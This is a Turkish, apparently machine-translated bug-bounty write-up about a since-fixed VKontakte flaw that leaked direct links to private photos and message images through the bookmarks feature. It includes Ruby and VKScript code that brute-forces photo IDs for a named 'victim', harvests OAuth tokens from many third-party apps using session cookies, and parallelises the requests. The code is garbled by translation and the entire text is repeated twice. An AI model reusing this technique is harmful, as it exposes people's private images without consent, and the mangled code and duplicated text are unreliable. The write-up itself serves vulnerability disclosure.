Vk özel. VK güvenlik açığı: herhangi bir kullanıcının diyaloglarından ve gizli albümlerinden fotoğraf önizlemelerine erişim. VKontakte'de özel fotoğraflar ve albümler nasıl görüntülenir?

tl; dr

VK yer imlerinde, kişisel mesajlardan, herhangi bir kullanıcının/grubun albümlerinden özel fotoğraflara doğrudan bağlantılar alınmasını mümkün kılan bir güvenlik açığı keşfedildi. Belirli bir süre boyunca kullanıcının fotoğrafları üzerinden sıralanan ve ardından bu güvenlik açığı aracılığıyla görüntülere doğrudan bağlantılar alan bir komut dosyası yazıldı. Kısacası dünkü tüm fotoğraflarınızı 1 dakikada, geçen hafta yüklediğiniz tüm fotoğrafları 7 dakikada, geçen ay 20 dakikada, geçen yılki tüm fotoğrafları 2 saatte almak mümkündü. Güvenlik açığı şimdi giderildi. VKontakte yönetimi 10 bin oyluk bir ödül ödedi.

Bir bağlantı eklendiğinde, sunucu onu ayrıştırır, hangi varlığa atıfta bulunduğunu bulmaya çalışır ve bu nesne hakkında veri tabanından bilgi alır. Kural olarak, bu tür bir işlevi birçok koşulla yazarken, geliştiricinin bir şeyi unutma olasılığı çok yüksektir. Bu nedenle, geçmeyi göze alamadım ve biraz deney yapmak için birkaç dakika ayırmaya karar verdim.

Sonuç olarak, bir şey bulmayı başardım. Erişilemeyen bir fotoğrafa, nota veya videoya bağlantı eklerken, nesne hakkında bazı özel bilgilere ulaşmak mümkündü. Fotoğraf ve videolar söz konusu olduğunda, bu, üzerinde herhangi bir şey görmenin oldukça zor olduğu küçük (150x150) bir önizlemedir, özel notlar için başlık görüntülenmiştir. API Yöntemi ile favori.getLinks görüntüye bağlantılar elde etmek mümkündü, ancak yine çok küçük (75 piksel ve 130 piksel). Yani temelde ciddi bir şey yok.

Her şeyin normal sürümdeki gibi görüntülenip görüntülenmediğini kontrol etmek için sitenin mobil sürümüne gitmeye karar verdim. Sayfanın koduna baktığımda şunu gördüm:

Evet! özellik değerinde veri-src_big orijinal görüntüye doğrudan bir bağlantı kaydedildi!

Böylece, nereye yüklendiğine ve hangi gizlilik ayarlarına sahip olduğuna bakılmaksızın, Vkontakte'deki herhangi bir görsele doğrudan bağlantı almak mümkün oldu. Herhangi bir kullanıcının/grubun özel mesajlarından bir resim veya özel albümlerinden bir fotoğraf olabilir.

Görünüşe göre burada durup geliştiricilere yazılabilir, ancak bu güvenlik açığından yararlanarak kullanıcının tüm (iyi veya belirli bir süre içinde yüklenmiş) fotoğraflarına erişmenin mümkün olup olmadığını merak ettim. Buradaki asıl sorun, anladığınız gibi, türün özel bir fotoğrafının bağlantısının her zaman bilinmemesiydi. fotoğrafXXXXXX_XXXXXXX yer imi için Fotoğrafın kimliği üzerinden sıralama yapma fikri aklıma geldi ama nedense deli diye hemen reddettim. API'deki fotoğraflarla ilişkili yöntemleri kontrol ettim, uygulamanın albümlerle nasıl çalıştığına baktım, ancak kullanıcının tüm özel fotoğraflarının kimliklerini içeren bir liste almama yardımcı olabilecek herhangi bir sızıntı bulamadım. Zaten bu fikirden vazgeçmek istiyordum ama fotoğraflı bağlantıya tekrar baktığımda aniden bunun iyi bir fikir olduğunu anladım.

Fotoğraflar VK'da nasıl çalışır?

Ne yazık ki, iki saat deney yaptıktan sonra bunu hala anlamadım. 2012'de HighLoad++'da Oleg Illarionov, fotoğrafları nasıl depoladıkları, yatay parçalama ve yükleme için bir sunucunun rastgele seçimi hakkında birkaç söz söyledi, ancak sunucu kimliği ile fotoğraf kimliği arasında bağlantı olmadığı için bu bilgi bana hiçbir şey vermedi. Belli bir küresel sayaç olduğu açık, ancak orada başka bir mantık var ... Çünkü ikinci sayı olağan otomatik artış kullanılarak oluşturulmuş olsaydı, fotoğraflı kimliklerin değerleri uzun zaman önce çok büyük değerlere ulaşmış olurdu (örneğin, şu anda Facebook'ta ~ 700 trilyon), ancak Vkontakte'de bu değer yalnızca ~ 400 milyon (yine de istatistiklere bakılırsa, günlük kullanıcılar 30 milyondan fazla fotoğraf yükler). Onlar. bu rakamın benzersiz olmadığı açıktır, ancak rastgele de değildir. "Eski" kullanıcıların fotoğraflarından geçen bir senaryo yazdım ve alınan verilere dayanarak bu rakamın her kullanıcıyla ne kadar değiştiğini gösteren bir grafik çizdim. yıl:

Bazı faktörlere (sunucu sayısı mı yoksa yeni mantık mı?) bağlı olarak değerlerin sıçradığı görülebilir. Ancak sonuç olarak oldukça küçüktürler (özellikle son 2-3 yıldır) ve istenen zaman dilimi için id aralığını hesaplamak çok kolaydır. Yani, örneğin geçen yıl için kullanıcı fotoğraflarına doğrudan bağlantılar bulmak için, yalnızca 30 milyon (_320000000'den _350000000'e) farklı bağlantı varyasyonlarına yer işareti koymaya çalışmanız gerekir! Aşağıda, bunu birkaç dakika içinde yapmamı sağlayan kaba kuvvet tekniğini anlattım.

Fotoğraflar arasında sıralama

Aramayı hızlandırın x25

Var start = parseInt(Args.start); varend = parseInt(Args.end); var kurban kimliği = Args.id; var link = "http://vk.com/photo" + kurban kimliği + "_"; while(başlangıç ​​!= bitiş) ( API.fave.addLink(( "bağlantı": bağlantı + başlangıç ​​)); başlangıç ​​= başlangıç ​​+ 1; );
Böylece kaba kuvvet hızını 3*25 yer imi/sn'ye kadar artırmak mümkün oldu. Geçen yıl boyunca, fotoğraflar uzun süre sıralanırdı, ancak kısa süreler için bu sıralama yöntemi zaten oldukça iyiydi.

Yinelemeyi hızlandırın x25 * saniyedeki eşzamanlı istek sayısı

Başlangıç ​​​​olarak, gerekli sayıda uygulamayı bulmak (veya oluşturmak) gerekliydi. Belirli bir uygulama kimliği aralığında bağımsız uygulamaları arayan bir komut dosyası yazılmıştır:

Class StandaloneAppsFinder attr_reader:app_ids tanımla başlat(paramlar) @aralık = parametreler[:aralık içinde] @app_ids = tanımlı aramayı bitir (@aralık).her do |app_id| yanıt = open("https://api.vk.com/method/apps.get?app_id=#(app_id)").read uygulama = JSON.parse(response)["response"] app_ids<< app_id if standalone?(app) end end private def standalone?(app_data) app_data["type"] == "standalone" end end
Daha fazla numaralandırmayı daha da hızlandırmak için uygulamaları kullanıcı sayısına göre seçmek de mümkündü:

Ama bununla uğraşmamaya karar verdim.

Tamam, uygulamalar bulundu, şimdi kullanıcı verilerimize izin vermeleri ve token almaları gerekiyor. Yetkilendirme için Örtülü Akış mekanizmasını kullanmam gerekiyordu. Yetkilendirme URL'sini OAuth iletişim kutusundan ayrıştırmam ve yönlendirmeden sonra belirteci çıkarmam gerekiyordu. Bu sınıfın çalışması için çerezler gereklidir. p, ben(login.vk.com) ve remix-sid(vk.com):

Sınıf Kimlik Doğrulayıcı attr_reader:access_tokens def Initialize(cookie_header) @cookies = ( "Cookie" => cookie_header ) @access_tokens = end def Authorize_apps(apps) apps.each do |app_id| auth_url = extract_auth_url_from(oauth_page(app_id)) yönlendirme_url = open(auth_url, @cookies).base_uri.to_s erişim_belirteçleri<< extract_token_from(redirect_url) end end private def extract_auth_url_from(oauth_page_html) Nokogiri::HTML(oauth_page_html).css("form").attr("action").value end def extract_token_from(url) URI(url).fragment end def oauth_page(app_id) open(oauth_page_url(app_id), @cookies).read end def oauth_page_url(app_id) "https://oauth.vk.com/authorize?" + "client_id=#{app_id}&" + "response_type=token&" + "display=mobile&" + "scope=474367" end end
Ne kadar çok uygulama bulunursa, o kadar çok paralel istek bulunur. Tüm bunları paralel hale getirmek için, diğer görevlerde kendini kanıtlamış olan Typhoeus taşını kullanmaya karar verildi. Çok küçük bir bruteforcer çıktı:

Sınıf PhotosBruteforcer PHOTOS_ID_BY_PERIOD = ("bugün" => 366300000..366500000, "dün" => 366050000..366300000, "geçerli_ay" => 365000000..366500000, "son_ay" => 3600000 0 0..365000000, "current_year" => 350000000..366500000, "last_year" => 320000000..350000000 ) def başlangiç(paramlar) @victim_id = parametreler[:victim_id] @period = PHOTOS_ID_BY_PERIOD] end def run(token) s) hidra = Typhoeus::Hydra.new tokensIterator = 0 (@period).step(25) do |photo_id| url = "https://api.vk.com/method/execute?access_token=#(tokens)&code=#(vkscript(photo_id))" encoded_url = URI.escape(url).gsub("+", "%2B").delete("\n") tokensIterator = tokensIterator == tokens.count - 1 ? 0: tokensIterator + 1 hydra.queue Typhoeus::Request.new encoded_url hydra.run if tokensIterator.zero? hydra.queued_requests.count.zero olmadıkça hydra.run sonlandırılsın mı? özel tanımlamayı sonlandır vkscript(photo_id)<<-VKScript var start = #{photo_id}; var end = #{photo_id + 25}; var link = "http://vk.com/photo#{@victim_id}" + "_"; while(start != end) { API.fave.addLink({ "link": link + start }); start = start + 1; }; return start; VKScript end end
Kaba kuvveti daha da hızlandırmak için yanıtta gereksiz bir vücuttan kurtulma girişimi oldu, ancak KAFA istek sunucusu "Vkontakte" bir hata veriyor 501 uygulanmadı.

Komut dosyasının son hali şöyle görünür:

"nokogiri" gerektirir "open-uri" gerektirir "typhoeus" gerektirir "json" gerektirir "./standalone_apps_finder" gerektirir "./photos_bruteforcer" gerektirir "./authenticator" gerektirir bruteforcer = PhotosBruteforcer.new(victim_id: ARGV, dönem: ARGV) apps_finder = StandaloneAppsFinder.new(in_range: 4800000..4) 8 00500) apps_finder.search # p,l - login.vk.com'dan çerezler # remixsid - vk.com'dan çerezler
Programı çalıştırdıktan sonra, belirli bir süre için kullanıcının tüm fotoğrafları yer imlerindeydi. Geriye yalnızca Vkontakte'nin mobil sürümüne gitmek, tarayıcı konsolunu açmak, doğrudan bağlantıları çıkarmak ve fotoğrafların orijinal boyutlarında keyfini çıkarmak kaldı.

Sonuçlar

Tablo, belirli bir dönemde fotoğraflı kimlikleri denemek için geçen ortalama süreyi gösterir. Eminim tüm bunlar 10-20 kat hızlandırılabilir. Örneğin, bir kaba kuvvet komut dosyasında, tüm istekler için büyük bir sıra oluşturun ve bunlar arasında normal senkronizasyon yapın, çünkü benim uygulamamda, zaman aşımı olan bir istek tüm süreci yavaşlatacaktır. Her neyse, birkaç EC2 bulut sunucusu satın alabilir ve herhangi bir kullanıcının tüm fotoğraflarını bir saat içinde alabilirsiniz. Ama ben zaten uyumak istiyordum.

Ve genel olarak, saldırganın 5 saat veya tüm gün üzerinde ne kadar zaman harcadığı önemli değil, çünkü öyle ya da böyle, özel görüntülere bağlantılar alacak. Özel bilgilere sınırlı bir süre içinde ironik bir şekilde erişme yeteneği, bu güvenlik açığının oluşturduğu ana tehdittir.

Güvenlik Açığı Bildirme

tl; dr

VK yer imlerinde, kişisel mesajlardan, herhangi bir kullanıcının/grubun albümlerinden özel fotoğraflara doğrudan bağlantılar alınmasını mümkün kılan bir güvenlik açığı keşfedildi. Belirli bir süre boyunca kullanıcının fotoğrafları üzerinden sıralanan ve ardından bu güvenlik açığı aracılığıyla görüntülere doğrudan bağlantılar alan bir komut dosyası yazıldı. Kısacası dünkü tüm fotoğraflarınızı 1 dakikada, geçen hafta yüklediğiniz tüm fotoğrafları 7 dakikada, geçen ay 20 dakikada, geçen yılki tüm fotoğrafları 2 saatte almak mümkündü. Güvenlik açığı şimdi giderildi. VKontakte yönetimi 10 bin oyluk bir ödül ödedi.

Bir bağlantı eklendiğinde, sunucu onu ayrıştırır, hangi varlığa atıfta bulunduğunu bulmaya çalışır ve bu nesne hakkında veri tabanından bilgi alır. Kural olarak, bu tür bir işlevi birçok koşulla yazarken, geliştiricinin bir şeyi unutma olasılığı çok yüksektir. Bu nedenle, geçmeyi göze alamadım ve biraz deney yapmak için birkaç dakika ayırmaya karar verdim.

Sonuç olarak, bir şey bulmayı başardım. Erişilemeyen bir fotoğrafa, nota veya videoya bağlantı eklerken, nesne hakkında bazı özel bilgilere ulaşmak mümkündü. Fotoğraf ve videolar söz konusu olduğunda, bu, üzerinde herhangi bir şey görmenin oldukça zor olduğu küçük (150x150) bir önizlemedir, özel notlar için başlık görüntülenmiştir. API Yöntemi ile favori.getLinks görüntüye bağlantılar elde etmek mümkündü, ancak yine çok küçük (75 piksel ve 130 piksel). Yani temelde ciddi bir şey yok.

Her şeyin normal sürümdeki gibi görüntülenip görüntülenmediğini kontrol etmek için sitenin mobil sürümüne gitmeye karar verdim. Sayfanın koduna baktığımda şunu gördüm:

Evet! özellik değerinde veri-src_big orijinal görüntüye doğrudan bir bağlantı kaydedildi!

Böylece, nereye yüklendiğine ve hangi gizlilik ayarlarına sahip olduğuna bakılmaksızın, Vkontakte'deki herhangi bir görsele doğrudan bağlantı almak mümkün oldu. Herhangi bir kullanıcının/grubun özel mesajlarından bir resim veya özel albümlerinden bir fotoğraf olabilir.

Görünüşe göre burada durup geliştiricilere yazılabilir, ancak bu güvenlik açığından yararlanarak kullanıcının tüm (iyi veya belirli bir süre içinde yüklenmiş) fotoğraflarına erişmenin mümkün olup olmadığını merak ettim. Buradaki asıl sorun, anladığınız gibi, türün özel bir fotoğrafının bağlantısının her zaman bilinmemesiydi. fotoğrafXXXXXX_XXXXXXX yer imi için Fotoğrafın kimliği üzerinden sıralama yapma fikri aklıma geldi ama nedense deli diye hemen reddettim. API'deki fotoğraflarla ilişkili yöntemleri kontrol ettim, uygulamanın albümlerle nasıl çalıştığına baktım, ancak kullanıcının tüm özel fotoğraflarının kimliklerini içeren bir liste almama yardımcı olabilecek herhangi bir sızıntı bulamadım. Zaten bu fikirden vazgeçmek istiyordum ama fotoğraflı bağlantıya tekrar baktığımda aniden bunun iyi bir fikir olduğunu anladım.

Fotoğraflar VK'da nasıl çalışır?

Ne yazık ki, iki saat deney yaptıktan sonra bunu hala anlamadım. 2012'de HighLoad++'da Oleg Illarionov, fotoğrafları nasıl depoladıkları, yatay parçalama ve yükleme için bir sunucunun rastgele seçimi hakkında birkaç söz söyledi, ancak sunucu kimliği ile fotoğraf kimliği arasında bağlantı olmadığı için bu bilgi bana hiçbir şey vermedi. Belli bir küresel sayaç olduğu açık, ancak orada başka bir mantık var ... Çünkü ikinci sayı olağan otomatik artış kullanılarak oluşturulmuş olsaydı, fotoğraflı kimliklerin değerleri uzun zaman önce çok büyük değerlere ulaşmış olurdu (örneğin, şu anda Facebook'ta ~ 700 trilyon), ancak Vkontakte'de bu değer yalnızca ~ 400 milyon (yine de istatistiklere bakılırsa, günlük kullanıcılar 30 milyondan fazla fotoğraf yükler). Onlar. bu rakamın benzersiz olmadığı açıktır, ancak rastgele de değildir. "Eski" kullanıcıların fotoğraflarından geçen bir senaryo yazdım ve alınan verilere dayanarak bu rakamın her kullanıcıyla ne kadar değiştiğini gösteren bir grafik çizdim. yıl:

Bazı faktörlere (sunucu sayısı mı yoksa yeni mantık mı?) bağlı olarak değerlerin sıçradığı görülebilir. Ancak sonuç olarak oldukça küçüktürler (özellikle son 2-3 yıldır) ve istenen zaman dilimi için id aralığını hesaplamak çok kolaydır. Yani, örneğin geçen yıl için kullanıcı fotoğraflarına doğrudan bağlantılar bulmak için, yalnızca 30 milyon (_320000000'den _350000000'e) farklı bağlantı varyasyonlarına yer işareti koymaya çalışmanız gerekir! Aşağıda, bunu birkaç dakika içinde yapmamı sağlayan kaba kuvvet tekniğini anlattım.

Fotoğraflar arasında sıralama

Aramayı hızlandırın x25

Var start = parseInt(Args.start); varend = parseInt(Args.end); var kurban kimliği = Args.id; var link = "http://vk.com/photo" + kurban kimliği + "_"; while(başlangıç ​​!= bitiş) ( API.fave.addLink(( "bağlantı": bağlantı + başlangıç ​​)); başlangıç ​​= başlangıç ​​+ 1; );
Böylece kaba kuvvet hızını 3*25 yer imi/sn'ye kadar artırmak mümkün oldu. Geçen yıl boyunca, fotoğraflar uzun süre sıralanırdı, ancak kısa süreler için bu sıralama yöntemi zaten oldukça iyiydi.

Yinelemeyi hızlandırın x25 * saniyedeki eşzamanlı istek sayısı

Başlangıç ​​​​olarak, gerekli sayıda uygulamayı bulmak (veya oluşturmak) gerekliydi. Belirli bir uygulama kimliği aralığında bağımsız uygulamaları arayan bir komut dosyası yazılmıştır:

Class StandaloneAppsFinder attr_reader:app_ids tanımla başlat(paramlar) @aralık = parametreler[:aralık içinde] @app_ids = tanımlı aramayı bitir (@aralık).her do |app_id| yanıt = open("https://api.vk.com/method/apps.get?app_id=#(app_id)").read uygulama = JSON.parse(response)["response"] app_ids<< app_id if standalone?(app) end end private def standalone?(app_data) app_data["type"] == "standalone" end end
Daha fazla numaralandırmayı daha da hızlandırmak için uygulamaları kullanıcı sayısına göre seçmek de mümkündü:

Ama bununla uğraşmamaya karar verdim.

Tamam, uygulamalar bulundu, şimdi kullanıcı verilerimize izin vermeleri ve token almaları gerekiyor. Yetkilendirme için Örtülü Akış mekanizmasını kullanmam gerekiyordu. Yetkilendirme URL'sini OAuth iletişim kutusundan ayrıştırmam ve yönlendirmeden sonra belirteci çıkarmam gerekiyordu. Bu sınıfın çalışması için çerezler gereklidir. p, ben(login.vk.com) ve remix-sid(vk.com):

Sınıf Kimlik Doğrulayıcı attr_reader:access_tokens def Initialize(cookie_header) @cookies = ( "Cookie" => cookie_header ) @access_tokens = end def Authorize_apps(apps) apps.each do |app_id| auth_url = extract_auth_url_from(oauth_page(app_id)) yönlendirme_url = open(auth_url, @cookies).base_uri.to_s erişim_belirteçleri<< extract_token_from(redirect_url) end end private def extract_auth_url_from(oauth_page_html) Nokogiri::HTML(oauth_page_html).css("form").attr("action").value end def extract_token_from(url) URI(url).fragment end def oauth_page(app_id) open(oauth_page_url(app_id), @cookies).read end def oauth_page_url(app_id) "https://oauth.vk.com/authorize?" + "client_id=#{app_id}&" + "response_type=token&" + "display=mobile&" + "scope=474367" end end
Ne kadar çok uygulama bulunursa, o kadar çok paralel istek bulunur. Tüm bunları paralel hale getirmek için, diğer görevlerde kendini kanıtlamış olan Typhoeus taşını kullanmaya karar verildi. Çok küçük bir bruteforcer çıktı:

Sınıf PhotosBruteforcer PHOTOS_ID_BY_PERIOD = ("bugün" => 366300000..366500000, "dün" => 366050000..366300000, "geçerli_ay" => 365000000..366500000, "son_ay" => 3600000 0 0..365000000, "current_year" => 350000000..366500000, "last_year" => 320000000..350000000 ) def başlangiç(paramlar) @victim_id = parametreler[:victim_id] @period = PHOTOS_ID_BY_PERIOD] end def run(token) s) hidra = Typhoeus::Hydra.new tokensIterator = 0 (@period).step(25) do |photo_id| url = "https://api.vk.com/method/execute?access_token=#(tokens)&code=#(vkscript(photo_id))" encoded_url = URI.escape(url).gsub("+", "%2B").delete("\n") tokensIterator = tokensIterator == tokens.count - 1 ? 0: tokensIterator + 1 hydra.queue Typhoeus::Request.new encoded_url hydra.run if tokensIterator.zero? hydra.queued_requests.count.zero olmadıkça hydra.run sonlandırılsın mı? özel tanımlamayı sonlandır vkscript(photo_id)<<-VKScript var start = #{photo_id}; var end = #{photo_id + 25}; var link = "http://vk.com/photo#{@victim_id}" + "_"; while(start != end) { API.fave.addLink({ "link": link + start }); start = start + 1; }; return start; VKScript end end
Kaba kuvveti daha da hızlandırmak için yanıtta gereksiz bir vücuttan kurtulma girişimi oldu, ancak KAFA istek sunucusu "Vkontakte" bir hata veriyor 501 uygulanmadı.

Komut dosyasının son hali şöyle görünür:

"nokogiri" gerektirir "open-uri" gerektirir "typhoeus" gerektirir "json" gerektirir "./standalone_apps_finder" gerektirir "./photos_bruteforcer" gerektirir "./authenticator" gerektirir bruteforcer = PhotosBruteforcer.new(victim_id: ARGV, dönem: ARGV) apps_finder = StandaloneAppsFinder.new(in_range: 4800000..4) 8 00500) apps_finder.search # p,l - login.vk.com'dan çerezler # remixsid - vk.com'dan çerezler
Programı çalıştırdıktan sonra, belirli bir süre için kullanıcının tüm fotoğrafları yer imlerindeydi. Geriye yalnızca Vkontakte'nin mobil sürümüne gitmek, tarayıcı konsolunu açmak, doğrudan bağlantıları çıkarmak ve fotoğrafların orijinal boyutlarında keyfini çıkarmak kaldı.

Sonuçlar

Tablo, belirli bir dönemde fotoğraflı kimlikleri denemek için geçen ortalama süreyi gösterir. Eminim tüm bunlar 10-20 kat hızlandırılabilir. Örneğin, bir kaba kuvvet komut dosyasında, tüm istekler için büyük bir sıra oluşturun ve bunlar arasında normal senkronizasyon yapın, çünkü benim uygulamamda, zaman aşımı olan bir istek tüm süreci yavaşlatacaktır. Her neyse, birkaç EC2 bulut sunucusu satın alabilir ve herhangi bir kullanıcının tüm fotoğraflarını bir saat içinde alabilirsiniz. Ama ben zaten uyumak istiyordum.

Ve genel olarak, saldırganın 5 saat veya tüm gün üzerinde ne kadar zaman harcadığı önemli değil, çünkü öyle ya da böyle, özel görüntülere bağlantılar alacak. Özel bilgilere sınırlı bir süre içinde ironik bir şekilde erişme yeteneği, bu güvenlik açığının oluşturduğu ana tehdittir.

Güvenlik Açığı Bildirme